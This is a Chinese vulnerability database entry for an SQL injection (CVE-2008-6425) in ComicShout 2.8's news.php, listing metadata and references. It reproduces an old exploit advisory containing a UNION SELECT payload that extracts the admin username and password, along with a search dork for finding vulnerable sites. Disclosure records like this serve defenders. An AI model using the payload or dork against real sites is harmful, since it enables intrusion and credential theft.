ComicShout 'news.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115326 漏洞类型 SQL注入
发布时间 2008-06-01 更新时间 2009-03-13
CVE编号 CVE-2008-6425 CNNVD-ID CNNVD-200903-135
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5713
https://www.securityfocus.com/bid/29464
https://cxsecurity.com/issue/WLB-2008060007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-135
|漏洞详情
ComicShout是一个基于WEB的动漫发布系统。ComicShout2.8版本的news.php中存在SQL注入漏洞。远程攻击者可以借助news_id参数,执行任意SQL指令。
|漏洞EXP
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+         ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability       +==--
--==+====================================================================================+==--
                         - dreaming of necessity is reason to comply -

[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.


[~] Software: ComicShout 2.8
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-06-01]
|受影响的产品
ComicShout ComicShout 2.8
|参考资料

来源:XF
名称:comicshout-news-sql-injection(42758)
链接:http://xforce.iss.net/xforce/xfdb/42758
来源:BID
名称:29464
链接:http://www.securityfocus.com/bid/29464
来源:BUGTRAQ
名称:20080602ComicShout2.8(news.phpnews_id)SQLInjectionVulnerability
链接:http://www.securityfocus.com/archive/1/492918
来源:MILW0RM
名称:5713
链接:http://www.milw0rm.com/exploits/5713
来源:OSVDB
名称:51438
链接:http://osvdb.org/51438